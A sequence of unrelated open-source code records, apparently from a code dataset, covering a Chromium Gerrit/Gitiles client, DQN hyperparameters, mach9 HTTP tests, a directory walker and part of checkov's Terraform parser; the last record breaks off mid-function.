file_infile.write("\n".join(lines_output))
|
the-stack_106_22146
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Simple client for the Gerrit REST API.
Example usage:
./gerrit_client.py -j /tmp/out.json -f json \
-u https://chromium.googlesource.com/chromium/src/+log
"""
import argparse
import json
import logging
import os
import sys
import tarfile
import time
import urllib
import urlparse
DEPOT_TOOLS = os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir, os.pardir, os.pardir,
os.pardir))
sys.path.insert(0, DEPOT_TOOLS)
from gerrit_util import CreateHttpConn, ReadHttpResponse, ReadHttpJsonResponse
def reparse_url(parsed_url, query_params):
return urlparse.ParseResult(
scheme=parsed_url.scheme,
netloc=parsed_url.netloc,
path=parsed_url.path,
params=parsed_url.params,
fragment=parsed_url.fragment,
query=urllib.urlencode(query_params, doseq=True))
def gitiles_get(parsed_url, handler, attempts):
# This insanity is due to CreateHttpConn interface :(
host = parsed_url.netloc
path = parsed_url.path
if parsed_url.query:
path += '?%s' % (parsed_url.query, )
retry_delay_seconds = 1
attempt = 1
while True:
try:
return handler(CreateHttpConn(host, path))
except Exception as e:
if attempt >= attempts:
raise
logging.exception('Failed to perform Gitiles operation: %s', e)
# Retry from previous loop.
logging.error('Sleeping %d seconds before retry (%d/%d)...',
retry_delay_seconds, attempt, attempts)
time.sleep(retry_delay_seconds)
retry_delay_seconds *= 2
attempt += 1
def fetch_log_with_paging(query_params, limit, fetch):
"""Fetches log, possibly requesting multiple pages to do so.
Args:
query_params (dict): Parameters to use in the request.
limit (int): Page size.
fetch (function): Function to use to make the requests.
Returns:
Dict with key "log", whose value is a list of commits.
"""
# Log api returns {'log': [list of commits], 'next': hash}.
last_result = fetch(query_params)
commits = last_result['log']
while last_result.get('next') and len(commits) < limit:
query_params['s'] = last_result.get('next')
last_result = fetch(query_params)
# The first commit in `last_result` is not necessarily the parent of the
# last commit in result so far! This is because log command can be done on
# one file object, for example:
# https://gerrit.googlesource.com/gitiles/+log/1c21279f337da8130/COPYING
# Even when getting log for the whole repository, there could be merge
# commits.
commits.extend(last_result['log'])
# Use 'next' field (if any) from `last_result`, but commits aggregated
# from all the results. This essentially imitates paging with at least
# `limit` page size.
last_result['log'] = commits
logging.debug(
'fetched %d commits, next: %s.', len(commits),
last_result.get('next'))
return last_result
def main(arguments):
parser = create_argparser()
args = parser.parse_args(arguments)
if args.extract_to and args.format != "archive":
parser.error('--extract-to requires --format=archive')
if not args.extract_to and args.format == "archive":
parser.error('--format=archive requires --extract-to')
if args.extract_to:
# make sure it is absolute and ends with '/'
args.extract_to = os.path.join(os.path.abspath(args.extract_to), '')
os.makedirs(args.extract_to)
parsed_url = urlparse.urlparse(args.url)
if not parsed_url.scheme.startswith('http'):
parser.error('Invalid URI scheme (expected http or https): %s' % args.url)
query_params = {}
if parsed_url.query:
query_params.update(urlparse.parse_qs(parsed_url.query))
# Force the format specified on command-line.
if query_params.get('format'):
parser.error('URL must not contain format; use --format command line flag '
'instead.')
query_params['format'] = args.format
kwargs = {}
accept_statuses = frozenset([int(s) for s in args.accept_statuses.split(',')])
if accept_statuses:
kwargs['accept_statuses'] = accept_statuses
# Choose handler.
if args.format == 'json':
def handler(conn):
return ReadHttpJsonResponse(conn, **kwargs)
elif args.format == 'text':
# Text fetching will pack the text into structured JSON.
def handler(conn):
# Wrap in a structured JSON for export to recipe module.
return {
'value': ReadHttpResponse(conn, **kwargs).read() or None,
}
elif args.format == 'archive':
# Archive fetching hooks result to tarfile extraction. This implementation
# is able to do a streaming extraction operation without having to buffer
# the entire tarfile.
def handler(conn):
ret = {
'extracted': {
'filecount': 0,
'bytes': 0,
},
'skipped': {
'filecount': 0,
'bytes': 0,
'names': [],
}
}
fileobj = ReadHttpResponse(conn, **kwargs)
with tarfile.open(mode='r|*', fileobj=fileobj) as tf:
# monkeypatch the TarFile object to allow printing messages and
# collecting stats for each extracted file. extractall makes a single
# linear pass over the tarfile, which is compatible with
# ReadHttpResponse; other naive implementations (such as `getmembers`)
# do random access over the file and would require buffering the whole
# thing (!!).
em = tf._extract_member
def _extract_member(tarinfo, targetpath):
if not os.path.abspath(targetpath).startswith(args.extract_to):
print('Skipping %s' % (tarinfo.name,))
ret['skipped']['filecount'] += 1
ret['skipped']['bytes'] += tarinfo.size
ret['skipped']['names'].append(tarinfo.name)
return
print('Extracting %s' % (tarinfo.name,))
ret['extracted']['filecount'] += 1
ret['extracted']['bytes'] += tarinfo.size
return em(tarinfo, targetpath)
tf._extract_member = _extract_member
tf.extractall(args.extract_to)
return ret
if args.log_start:
query_params['s'] = args.log_start
def fetch(query_params):
parsed_url_with_query = reparse_url(parsed_url, query_params)
result = gitiles_get(parsed_url_with_query, handler, args.attempts)
if not args.quiet:
logging.info('Read from %s: %s', parsed_url_with_query.geturl(), result)
return result
if args.log_limit:
if args.format != 'json':
parser.error('--log-limit works with json format only')
result = fetch_log_with_paging(query_params, args.log_limit, fetch)
else:
# Either not a log request, or don't care about paging.
# So, just return whatever is fetched the first time.
result = fetch(query_params)
with open(args.json_file, 'w') as json_file:
json.dump(result, json_file)
return 0
def create_argparser():
parser = argparse.ArgumentParser()
parser.add_argument(
'-j', '--json-file',
help='Path to json file for output.')
parser.add_argument(
'--extract-to',
help='Local path to extract archive url. Must not exist.')
parser.add_argument(
'-f', '--format', required=True, choices=('json', 'text', 'archive'))
parser.add_argument(
'-u', '--url', required=True,
help='Url of gitiles. For example, '
'https://chromium.googlesource.com/chromium/src/+refs. '
'Insert a/ after domain for authenticated access.')
parser.add_argument(
'-a', '--attempts', type=int, default=1,
help='The number of attempts to make (with exponential backoff) before '
'failing. If several requests are to be made, applies per each '
'request separately.')
parser.add_argument(
'-q', '--quiet', action='store_true',
help='Suppress file contents logging output.')
parser.add_argument(
'--log-limit', type=int, default=None,
help='Follow gitiles pages to fetch at least this many commits. By '
'default, first page with unspecified number of commits is fetched. '
'Only for https://<hostname>/<repo>/+log/... gitiles request.')
parser.add_argument(
'--log-start',
help='If given, continue fetching log by paging from this commit hash. '
'This value can be typically be taken from json result of previous '
'call to log, which returns next page start commit as "next" key. '
'Only for https://<hostname>/<repo>/+log/... gitiles request.')
parser.add_argument(
'--accept-statuses', type=str, default='200',
help='Comma-separated list of Status codes to accept as "successful" '
'HTTP responses.')
return parser
if __name__ == '__main__':
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
sys.exit(main(sys.argv[1:]))
|
the-stack_106_22151
|
class Hyperparameters():
def __init__(self):
self.IMAGESIZE = [30,30]
self.MEAN_REWARD_BOUND = 19.0
self.CHANNEL_NUM = 4
self.ACTION_SPACE = 6
self.GAMMA = 0.99
self.BATCH_SIZE = 32
self.REPLAY_SIZE = 10000
self.REPLAY_START_SIZE = 10000
self.LEARING_RATE = 1e-4 *1
self.SYNC_TARGET_FRAMES = 1000
######################################
self.EPS_INITIAL = 1.0
self.FIXED_EPSILON = 0.8
self.THRESH_START_DECAY = 20
self.EPS_DECAY = 0.99
self.EPS_MIN = 0.02
######################################
self.ITER_NUM = 80
self.EPISODE_NUM = 500
self.ITER_SUCCESS_FILL = 100
|
the-stack_106_22152
|
import pytest
from mach9.http import HttpProtocol, BodyChannel
from tests.utils import Transport
@pytest.mark.asyncio
async def test_body_channel_send():
transport = Transport()
body_channel = BodyChannel(transport)
i = 1
await body_channel.send(i)
o = await body_channel.receive()
assert i == o
def test_check_headers():
protocol = HttpProtocol(loop=None, request_handler=None)
result_headers = protocol.check_headers([])
assert result_headers['connection_close'] is False
assert result_headers['content_length'] is False
result_headers = protocol.check_headers([
[b'Connection', b'close'],
[b'Content-Length', b'1'],
])
assert result_headers['connection_close'] is True
assert result_headers['content_length'] is True
result_headers = protocol.check_headers([
[b'Connection', b'__close'],
[b'_Content-Length', b'1'],
])
assert result_headers['connection_close'] is False
assert result_headers['content_length'] is False
result_headers = protocol.check_headers([
[b'__Connection', b'close'],
[b'Content-Length', b'1'],
])
assert result_headers['connection_close'] is False
assert result_headers['content_length'] is True
def test_is_reponse_chunk():
protocol = HttpProtocol(loop=None, request_handler=None)
result = protocol.is_response_chunk({'a': 1})
assert result is True
result = protocol.is_response_chunk({'status': 1})
assert result is False
result = protocol.is_response_chunk({'headers': 1})
assert result is False
result = protocol.is_response_chunk({'status': 1, 'headers': 1})
assert result is False
def test_make_header_content():
protocol = HttpProtocol(loop=None, request_handler=None)
result_headers = {
'connection_close': False,
'content_length': False
}
header_content = protocol.make_header_content(
None, result_headers, b'123', False)
assert header_content == b''
result_headers = {
'connection_close': False,
'content_length': False
}
header_content = protocol.make_header_content(
[], result_headers, b'123', False)
assert header_content == b'Content-Length: 3\r\n'
result_headers = {
'connection_close': False,
'content_length': False
}
header_content = protocol.make_header_content(
[], result_headers, b'123', True)
assert header_content == b''
result_headers = {
'connection_close': False,
'content_length': True
}
header_content = protocol.make_header_content(
[], result_headers, b'123', False)
assert header_content == b''
result_headers = {
'connection_close': True,
'content_length': True
}
header_content = protocol.make_header_content(
[[b'Connection', b'1']], result_headers, b'123', False)
assert header_content == b''
result_headers = {
'connection_close': False,
'content_length': True
}
header_content = protocol.make_header_content(
[[b'Connection', b'1']], result_headers, b'123', False)
assert header_content == b''
result_headers = {
'connection_close': False,
'content_length': False
}
header_content = protocol.make_header_content(
[[b'foo', b'bar']], result_headers, b'123', False)
assert header_content == b'Content-Length: 3\r\nfoo: bar\r\n'
def get_request_body_chunk():
http_protocol = HttpProtocol(loop=None, request_handler=None,)
message = http_protocol.get_request_body_chunk(b'foo', False, True)
message['content'] = b'foo'
message['closed'] = False
message['more_content'] = True
def test_get_message():
http_protocol = HttpProtocol(loop=None, request_handler=None)
transport = Transport()
message = http_protocol.get_message(
transport,
'1.1',
b'GET',
b'http://127.0.0.1:1234/foo/bar?key1=1&key2=2',
[[b'k1', b'v1']])
assert message['channel'] == 'http.request'
assert message['reply_channel'] is None
assert message['http_version'] == '1.1'
assert message['method'] == 'GET'
assert message['scheme'] == 'http'
assert message['query_string'] == b'key1=1&key2=2'
assert message['root_path'] == ''
assert message['headers'] == [[b'k1', b'v1']]
assert message['body'] == b''
assert message['body_channel'] is None
assert message['client'] == ('127.0.0.1', 1234)
assert message['server'] == ('127.0.0.1', 5678)
|
the-stack_106_22153
|
import os
def WalkFileStructure(curDir, callback, reportFiles = True, reportFolders = True):
for name in os.listdir(curDir):
if name.startswith("."):
continue
fullPath = os.path.join(curDir, name)
if (reportFiles and os.path.isfile(fullPath)) or (reportFolders and os.path.isdir(fullPath)):
if not callback(curDir, name):
return False
if os.path.isdir(fullPath):
if not WalkFileStructure(fullPath, callback, reportFiles, reportFolders):
return False
return True
def BuildFileDictionary(dir):
nameToPath = {}
def foundPath(parentDir: str, name: str):
if not name.endswith(".md") and not name.endswith(".jpg") and not name.endswith(".png"):
return True
fullPath = os.path.join(parentDir, name)
if name in nameToPath:
print(f"Error: File name is not unique: '{name}' - {fullPath}")
#return False
nameToPath[name] = fullPath
return True
WalkFileStructure(dir, foundPath, reportFolders=False)
return nameToPath
|
the-stack_106_22155
|
import datetime
import json
import logging
import os
import re
from copy import deepcopy
from json import dumps, loads, JSONEncoder
from pathlib import Path
from typing import Optional, Dict, Mapping, Set, Tuple, Callable, Any, List, Type
import deep_merge
import hcl2
from lark import Tree
from checkov.common.parallelizer.parallel_runner import parallel_runner
from checkov.common.runners.base_runner import filter_ignored_paths
from checkov.common.util.config_utils import should_scan_hcl_files
from checkov.common.util.consts import DEFAULT_EXTERNAL_MODULES_DIR, RESOLVED_MODULE_ENTRY_NAME
from checkov.common.variables.context import EvaluationContext
from checkov.terraform.checks.utils.dependency_path_handler import unify_dependency_path
from checkov.terraform.graph_builder.graph_components.block_types import BlockType
from checkov.terraform.graph_builder.graph_components.module import Module
from checkov.terraform.graph_builder.utils import remove_module_dependency_in_path
from checkov.terraform.module_loading.content import ModuleContent
from checkov.terraform.module_loading.module_finder import load_tf_modules
from checkov.terraform.module_loading.registry import module_loader_registry as default_ml_registry, \
ModuleLoaderRegistry
from checkov.terraform.parser_utils import eval_string, find_var_blocks
external_modules_download_path = os.environ.get('EXTERNAL_MODULES_DIR', DEFAULT_EXTERNAL_MODULES_DIR)
class DefinitionsEncoder(JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
elif isinstance(obj, Tree):
return str(obj)
elif isinstance(obj, datetime.date):
return str(obj)
return super().default(obj)
def _filter_ignored_paths(root, paths, excluded_paths):
filter_ignored_paths(root, paths, excluded_paths)
[paths.remove(path) for path in list(paths) if path in [default_ml_registry.external_modules_folder_name]]
class Parser:
def __init__(self, module_class: Type[Module] = Module):
self.module_class = module_class
self._parsed_directories = set()
self.external_modules_source_map: Dict[Tuple[str, str], str] = {}
self.module_address_map: Dict[Tuple[str, str], str] = {}
# This ensures that we don't try to double-load modules
# Tuple is <file>, <module_index>, <name> (see _load_modules)
self._loaded_modules: Set[Tuple[str, int, str]] = set()
self.external_variables_data = []
def _init(self, directory: str, out_definitions: Optional[Dict],
out_evaluations_context: Dict[str, Dict[str, EvaluationContext]],
out_parsing_errors: Dict[str, Exception],
env_vars: Mapping[str, str],
download_external_modules: bool,
external_modules_download_path: str,
excluded_paths: Optional[List[str]] = None,
tf_var_files: Optional[List[str]] = None):
self.directory = directory
self.out_definitions = out_definitions
self.out_evaluations_context = out_evaluations_context
self.out_parsing_errors = out_parsing_errors
self.env_vars = env_vars
self.download_external_modules = download_external_modules
self.external_modules_download_path = external_modules_download_path
self.external_modules_source_map = {}
self.module_address_map = {}
self.tf_var_files = tf_var_files
self.scan_hcl = should_scan_hcl_files()
if self.out_evaluations_context is None:
self.out_evaluations_context = {}
if self.out_parsing_errors is None:
self.out_parsing_errors = {}
if self.env_vars is None:
self.env_vars = dict(os.environ)
self.excluded_paths = excluded_paths
def _check_process_dir(self, directory):
if directory not in self._parsed_directories:
self._parsed_directories.add(directory)
return True
else:
return False
def parse_directory(self, directory: str, out_definitions: Optional[Dict],
out_evaluations_context: Dict[str, Dict[str, EvaluationContext]] = None,
out_parsing_errors: Dict[str, Exception] = None,
env_vars: Mapping[str, str] = None,
download_external_modules: bool = False,
external_modules_download_path: str = DEFAULT_EXTERNAL_MODULES_DIR,
excluded_paths: Optional[List[str]] = None,
vars_files: Optional[List[str]] = None,
external_modules_content_cache: Optional[Dict[str, ModuleContent]] = None):
self._init(directory, out_definitions, out_evaluations_context, out_parsing_errors, env_vars,
download_external_modules, external_modules_download_path, excluded_paths)
self._parsed_directories.clear()
default_ml_registry.root_dir = directory
default_ml_registry.download_external_modules = download_external_modules
default_ml_registry.external_modules_folder_name = external_modules_download_path
default_ml_registry.module_content_cache = external_modules_content_cache if external_modules_content_cache else {}
load_tf_modules(directory)
self._parse_directory(dir_filter=lambda d: self._check_process_dir(d), vars_files=vars_files)
def parse_file(self, file: str, parsing_errors: Dict[str, Exception] = None, scan_hcl = False) -> Optional[Dict]:
if file.endswith(".tf") or file.endswith(".tf.json") or (scan_hcl and file.endswith(".hcl")):
parse_result = _load_or_die_quietly(Path(file), parsing_errors)
if parse_result:
parse_result = self._serialize_definitions(parse_result)
parse_result = self._clean_parser_types(parse_result)
return parse_result
else:
return None
def _parse_directory(self, include_sub_dirs: bool = True,
module_loader_registry: ModuleLoaderRegistry = default_ml_registry,
dir_filter: Callable[[str], bool] = lambda _: True,
vars_files: Optional[List[str]] = None):
"""
Load and resolve configuration files starting in the given directory, merging the
resulting data into `tf_definitions`. This loads data according to the Terraform Code Organization
specification (https://www.terraform.io/docs/configuration/index.html#code-organization), starting
in the given directory and possibly moving out from there.
The resulting data dictionary generally follows the layout of HCL parsing with a couple distinctions:
- Data is broken out by file from which the data was loaded. So: <file>: <data>
- Loaded modules will also be keyed by referrer info: <file>[<referring_file>#<index>]: <data>
- Module block will included a "__resolved__" key with a list of the file/referrer names under
which data for the file was loaded. For example: "__resolved__": ["main.tf#0"]. The values will
correspond to the file names mentioned in the first bullet.
- All variables that can be resolved will be resolved.
:param include_sub_dirs: If true, subdirectories will be walked.
:param module_loader_registry: Registry used for resolving modules. This allows customization of how
much resolution is performed (and easier testing) by using a manually
constructed registry rather than the default.
:param dir_filter: Determines whether or not a directory should be processed. Returning
True will allow processing. The argument will be the absolute path of
the directory.
"""
keys_referenced_as_modules: Set[str] = set()
if include_sub_dirs:
for sub_dir, d_names, f_names in os.walk(self.directory):
# filter subdirectories for future iterations (we filter files while iterating the directory)
_filter_ignored_paths(sub_dir, d_names, self.excluded_paths)
if dir_filter(os.path.abspath(sub_dir)):
self._internal_dir_load(sub_dir, module_loader_registry, dir_filter,
keys_referenced_as_modules, vars_files=vars_files,
root_dir=self.directory, excluded_paths=self.excluded_paths)
else:
self._internal_dir_load(self.directory, module_loader_registry, dir_filter,
keys_referenced_as_modules, vars_files=vars_files)
# Ensure anything that was referenced as a module is removed
for key in keys_referenced_as_modules:
if key in self.out_definitions:
del self.out_definitions[key]
def _internal_dir_load(self, directory: str,
module_loader_registry: ModuleLoaderRegistry,
dir_filter: Callable[[str], bool],
keys_referenced_as_modules: Set[str],
specified_vars: Optional[Mapping[str, str]] = None,
module_load_context: Optional[str] = None,
vars_files: Optional[List[str]] = None,
root_dir: Optional[str] = None,
excluded_paths: Optional[List[str]] = None):
"""
See `parse_directory` docs.
:param directory: Directory in which .tf and .tfvars files will be loaded.
:param module_loader_registry: Registry used for resolving modules. This allows customization of how
much resolution is performed (and easier testing) by using a manually
constructed registry rather than the default.
:param dir_filter: Determines whether or not a directory should be processed. Returning
True will allow processing. The argument will be the absolute path of
the directory.
:param specified_vars: Specifically defined variable values, overriding values from any other source.
"""
# Stage 1: Look for applicable files in the directory:
# https://www.terraform.io/docs/configuration/index.html#code-organization
# Load the raw data for non-variable files, but perform no processing other than loading
# variable default values.
# Variable files are also flagged for later processing.
var_value_and_file_map: Dict[str, Tuple[Any, str]] = {}
hcl_tfvars: Optional[os.DirEntry] = None
json_tfvars: Optional[os.DirEntry] = None
auto_vars_files: List[os.DirEntry] = [] # *.auto.tfvars / *.auto.tfvars.json
explicit_var_files: List[os.DirEntry] = [] # files passed with --var-file; only process the ones that are in this directory
dir_contents = list(os.scandir(directory))
if excluded_paths:
filter_ignored_paths(root_dir, dir_contents, excluded_paths)
tf_files_to_load = []
for file in dir_contents:
# Ignore directories and hidden files
try:
if not file.is_file() or file.name.startswith("."):
continue
except OSError:
# Skip files that can't be accessed
continue
# Variable files
# See: https://www.terraform.io/docs/configuration/variables.html#variable-definitions-tfvars-files
if file.name == "terraform.tfvars.json":
json_tfvars = file
elif file.name == "terraform.tfvars":
hcl_tfvars = file
elif file.name.endswith(".auto.tfvars.json") or file.name.endswith(".auto.tfvars"):
auto_vars_files.append(file)
elif vars_files and file.path in vars_files:
explicit_var_files.append(file)
# Resource files
elif file.name.endswith(".tf") or (self.scan_hcl and file.name.endswith('.hcl')): # TODO: add support for .tf.json
tf_files_to_load.append(file)
files_to_data = self._load_files(tf_files_to_load)
for file, data in sorted(files_to_data, key=lambda x: x[0]):
if not data:
continue
self.out_definitions[file] = data
# Load variable defaults
# (see https://www.terraform.io/docs/configuration/variables.html#declaring-an-input-variable)
var_blocks = data.get("variable")
if var_blocks and isinstance(var_blocks, list):
for var_block in var_blocks:
if not isinstance(var_block, dict):
continue
for var_name, var_definition in var_block.items():
if not isinstance(var_definition, dict):
continue
default_value = var_definition.get("default")
if default_value is not None and isinstance(default_value, list):
self.external_variables_data.append((var_name, default_value[0], file))
var_value_and_file_map[var_name] = default_value[0], file
# Stage 2: Load vars in proper order:
# https://www.terraform.io/docs/configuration/variables.html#variable-definition-precedence
# Defaults are loaded in stage 1.
# Then loading in this order with later taking precedence:
# - Environment variables
# - The terraform.tfvars file, if present.
# - The terraform.tfvars.json file, if present.
# - Any *.auto.tfvars or *.auto.tfvars.json files, processed in lexical order of
# their filenames.
# Overriding everything else, variables form `specified_vars`, which are considered
# directly set.
for key, value in self.env_vars.items(): # env vars
if not key.startswith("TF_VAR_"):
continue
var_value_and_file_map[key[7:]] = value, f"env:{key}"
self.external_variables_data.append((key[7:], value, f"env:{key}"))
if hcl_tfvars: # terraform.tfvars
data = _load_or_die_quietly(hcl_tfvars, self.out_parsing_errors, clean_definitions=False)
if data:
var_value_and_file_map.update({k: (_safe_index(v, 0), hcl_tfvars.path) for k, v in data.items()})
self.external_variables_data.extend([(k, _safe_index(v, 0), hcl_tfvars.path) for k, v in data.items()])
if json_tfvars: # terraform.tfvars.json
data = _load_or_die_quietly(json_tfvars, self.out_parsing_errors)
if data:
var_value_and_file_map.update({k: (v, json_tfvars.path) for k, v in data.items()})
self.external_variables_data.extend([(k, v, json_tfvars.path) for k, v in data.items()])
auto_var_files_to_data = self._load_files(auto_vars_files)
for var_file, data in sorted(auto_var_files_to_data, key=lambda x: x[0]):
if data:
var_value_and_file_map.update({k: (v, var_file) for k, v in data.items()})
self.external_variables_data.extend([(k, v, var_file) for k, v in data.items()])
explicit_var_files_to_data = self._load_files(explicit_var_files)
# it's possible that os.scandir returned the var files in a different order than they were specified
for var_file, data in sorted(explicit_var_files_to_data, key=lambda x: vars_files.index(x[0])):
if data:
var_value_and_file_map.update({k: (v, var_file) for k, v in data.items()})
self.external_variables_data.extend([(k, v, var_file) for k, v in data.items()])
if specified_vars: # specified
var_value_and_file_map.update({k: (v, "manual specification") for k, v in specified_vars.items()})
self.external_variables_data.extend([(k, v, "manual specification") for k, v in specified_vars.items()])
# IMPLEMENTATION NOTE: When resolving `module.` references, access to the entire data map is needed. It
# may be a little overboard, but I don't want to just pass the entire data map down
# because it break encapsulations and I don't want to cause confusion about what data
# set it being processed. To avoid this, here's a Callable that will get the data
# map for a particular module reference. (Might be OCD, but...)
module_data_retrieval = lambda module_ref: self.out_definitions.get(module_ref)
# Stage 4: Load modules
# This stage needs to be done in a loop (again... alas, no DAG) because modules might not
# be loadable until other modules are loaded. This happens when parameters to one module
# depend on the output of another. For such cases, the base module must be loaded, then
# a parameter resolution pass needs to happen, then the second module can be loaded.
#
# One gotcha is that we need to make sure we load all modules at some point, even if their
# parameters don't resolve. So, if we hit a spot where resolution doesn't change anything
# and there are still modules to be loaded, they will be forced on the next pass.
force_final_module_load = False
for i in range(0, 10): # circuit breaker - no more than 10 loops
logging.debug("Module load loop %d", i)
# Stage 4a: Load eligible modules
has_more_modules = self._load_modules(directory, module_loader_registry,
dir_filter, module_load_context,
keys_referenced_as_modules,
force_final_module_load)
# Stage 4b: Variable resolution round 2 - now with (possibly more) modules
made_var_changes = False
if not has_more_modules:
break # nothing more to do
elif not made_var_changes:
# If there are more modules to load but no variables were resolved, then to a final module
# load, forcing things through without complete resolution.
force_final_module_load = True
def _load_files(self, files):
def _load_file(file):
parsing_errors = {}
result = _load_or_die_quietly(file, parsing_errors)
# the exceptions type can un-pickleable
for path, e in parsing_errors.items():
parsing_errors[path] = Exception(str(e))
return (file.path, result), parsing_errors
results = parallel_runner.run_function(_load_file, files)
files_to_data = []
for result, parsing_errors in results:
self.out_parsing_errors.update(parsing_errors)
files_to_data.append(result)
return files_to_data
def _load_modules(self, root_dir: str, module_loader_registry: ModuleLoaderRegistry,
dir_filter: Callable[[str], bool], module_load_context: Optional[str],
keys_referenced_as_modules: Set[str], ignore_unresolved_params: bool = False) -> bool:
"""
Load modules which have not already been loaded and can be loaded (don't have unresolved parameters).
:param ignore_unresolved_params: If true, not-yet-loaded modules will be loaded even if they are
passed parameters that are not fully resolved.
:return: True if there were modules that were not loaded due to unresolved
parameters.
"""
all_module_definitions = {}
all_module_evaluations_context = {}
skipped_a_module = False
for file in list(self.out_definitions.keys()):
# Don't process a file in a directory other than the directory we're processing. For example,
# if we're down dealing with <top_dir>/<module>/something.tf, we don't want to rescan files
# up in <top_dir>.
if os.path.dirname(file) != root_dir:
continue
# Don't process a file reference which has already been processed
if file.endswith("]"):
continue
file_data = self.out_definitions.get(file)
if file_data is None:
continue
module_calls = file_data.get("module")
if not module_calls or not isinstance(module_calls, list):
continue
for module_index, module_call in enumerate(module_calls):
if not isinstance(module_call, dict):
continue
# There should only be one module reference per outer dict, but... safety first
for module_call_name, module_call_data in module_call.items():
if not isinstance(module_call_data, dict):
continue
module_address = (file, module_index, module_call_name)
if module_address in self._loaded_modules:
continue
# Variables being passed to module, "source" and "version" are reserved
specified_vars = {k: v[0] if isinstance(v, list) else v for k, v in module_call_data.items()
if k != "source" and k != "version"}
if not ignore_unresolved_params:
has_unresolved_params = False
for k, v in specified_vars.items():
if not is_acceptable_module_param(v) or not is_acceptable_module_param(k):
has_unresolved_params = True
break
if has_unresolved_params:
skipped_a_module = True
continue
self._loaded_modules.add(module_address)
source = module_call_data.get("source")
if not source or not isinstance(source, list):
continue
source = source[0]
if not isinstance(source, str):
logging.debug(f"Skipping loading of {module_call_name} as source is not a string, it is: {source}")
continue
# Special handling for local sources to make sure we aren't double-parsing
if source.startswith("./") or source.startswith("../"):
source = os.path.normpath(
os.path.join(os.path.dirname(_remove_module_dependency_in_path(file)), source))
version = module_call_data.get("version", "latest")
if version and isinstance(version, list):
version = version[0]
try:
content = module_loader_registry.load(root_dir, source, version)
if not content.loaded():
logging.info(f'Got no content for {source}:{version}')
continue
self._internal_dir_load(directory=content.path(),
module_loader_registry=module_loader_registry,
dir_filter=dir_filter, specified_vars=specified_vars,
module_load_context=module_load_context,
keys_referenced_as_modules=keys_referenced_as_modules)
module_definitions = {path: self.out_definitions[path] for path in
list(self.out_definitions.keys()) if
os.path.dirname(path) == content.path()}
if not module_definitions:
continue
# NOTE: Modules are put into the main TF definitions structure "as normal" with the
# notable exception of the file name. For loaded modules referrer information is
# appended to the file name to create this format:
# <file_name>[<referred_file>#<referrer_index>]
# For example:
# /the/path/module/my_module.tf[/the/path/main.tf#0]
# The referrer and index allow a module allow a module to be loaded multiple
# times with differing data.
#
# In addition, the referring block will have a "__resolved__" key added with a
# list pointing to the location of the module data that was resolved. For example:
# "__resolved__": ["/the/path/module/my_module.tf[/the/path/main.tf#0]"]
resolved_loc_list = module_call_data.get(RESOLVED_MODULE_ENTRY_NAME)
if resolved_loc_list is None:
resolved_loc_list = []
module_call_data[RESOLVED_MODULE_ENTRY_NAME] = resolved_loc_list
# NOTE: Modules can load other modules, so only append referrer information where it
# has not already been added.
keys = list(module_definitions.keys())
for key in keys:
if key.endswith("]") or file.endswith("]"):
continue
keys_referenced_as_modules.add(key)
new_key = f"{key}[{file}#{module_index}]"
module_definitions[new_key] = module_definitions[key]
del module_definitions[key]
del self.out_definitions[key]
if new_key not in resolved_loc_list:
resolved_loc_list.append(new_key)
if (file, module_call_name) not in self.module_address_map:
self.module_address_map[(file, module_call_name)] = str(module_index)
resolved_loc_list.sort() # For testing, need predictable ordering
if all_module_definitions:
deep_merge.merge(all_module_definitions, module_definitions)
else:
all_module_definitions = module_definitions
self.external_modules_source_map[(source, version)] = content.path()
except Exception as e:
logging.warning("Unable to load module (source=\"%s\" version=\"%s\"): %s",
source, version, e)
if all_module_definitions:
deep_merge.merge(self.out_definitions, all_module_definitions)
if all_module_evaluations_context:
deep_merge.merge(self.out_evaluations_context, all_module_evaluations_context)
return skipped_a_module
def parse_hcl_module(
self,
source_dir: str,
source: str,
download_external_modules: bool = False,
external_modules_download_path: str = DEFAULT_EXTERNAL_MODULES_DIR,
parsing_errors: Optional[Dict[str, Exception]] = None,
excluded_paths: Optional[List[str]] = None,
vars_files: Optional[List[str]] = None,
external_modules_content_cache: Optional[Dict[str, ModuleContent]] = None
) -> Tuple[Module, Dict[str, Dict[str, Any]]]:
tf_definitions: Dict[str, Dict[str, Any]] = {}
self.parse_directory(directory=source_dir, out_definitions=tf_definitions, out_evaluations_context={},
out_parsing_errors=parsing_errors if parsing_errors is not None else {},
download_external_modules=download_external_modules,
external_modules_download_path=external_modules_download_path, excluded_paths=excluded_paths,
vars_files=vars_files, external_modules_content_cache=external_modules_content_cache)
tf_definitions = self._clean_parser_types(tf_definitions)
tf_definitions = self._serialize_definitions(tf_definitions)
module, tf_definitions = self.parse_hcl_module_from_tf_definitions(tf_definitions, source_dir, source)
return module, tf_definitions
def parse_hcl_module_from_tf_definitions(
self,
tf_definitions: Dict[str, Dict[str, Any]],
source_dir: str,
source: str,
) -> Tuple[Module, Dict[str, Dict[str, Any]]]:
module_dependency_map, tf_definitions, dep_index_mapping = self.get_module_dependency_map(tf_definitions)
module = self.get_new_module(
source_dir=source_dir,
module_dependency_map=module_dependency_map,
module_address_map=self.module_address_map,
external_modules_source_map=self.external_modules_source_map,
dep_index_mapping=dep_index_mapping,
)
self.add_tfvars(module, source)
copy_of_tf_definitions = deepcopy(tf_definitions)
for file_path, blocks in copy_of_tf_definitions.items():
for block_type in blocks:
try:
module.add_blocks(block_type, blocks[block_type], file_path, source)
except Exception as e:
logging.error(f'Failed to add block {blocks[block_type]}. Error:')
logging.error(e, exc_info=True)
return module, tf_definitions
@staticmethod
def _clean_parser_types(conf: dict) -> dict:
sorted_keys = list(conf.keys())
if len(conf.keys()) > 0 and all(isinstance(x, type(list(conf.keys())[0])) for x in conf.keys()):
sorted_keys = sorted(filter(lambda x: x is not None, conf.keys()))
# Create a new dict where the keys are sorted alphabetically
sorted_conf = {key: conf[key] for key in sorted_keys}
for attribute, values in sorted_conf.items():
if attribute == 'alias':
continue
if isinstance(values, list):
sorted_conf[attribute] = Parser._clean_parser_types_lst(values)
elif isinstance(values, dict):
sorted_conf[attribute] = Parser._clean_parser_types(conf[attribute])
elif isinstance(values, str) and values in ('true', 'false'):
sorted_conf[attribute] = True if values == 'true' else False
elif isinstance(values, set):
sorted_conf[attribute] = Parser._clean_parser_types_lst(list(values))
elif isinstance(values, Tree):
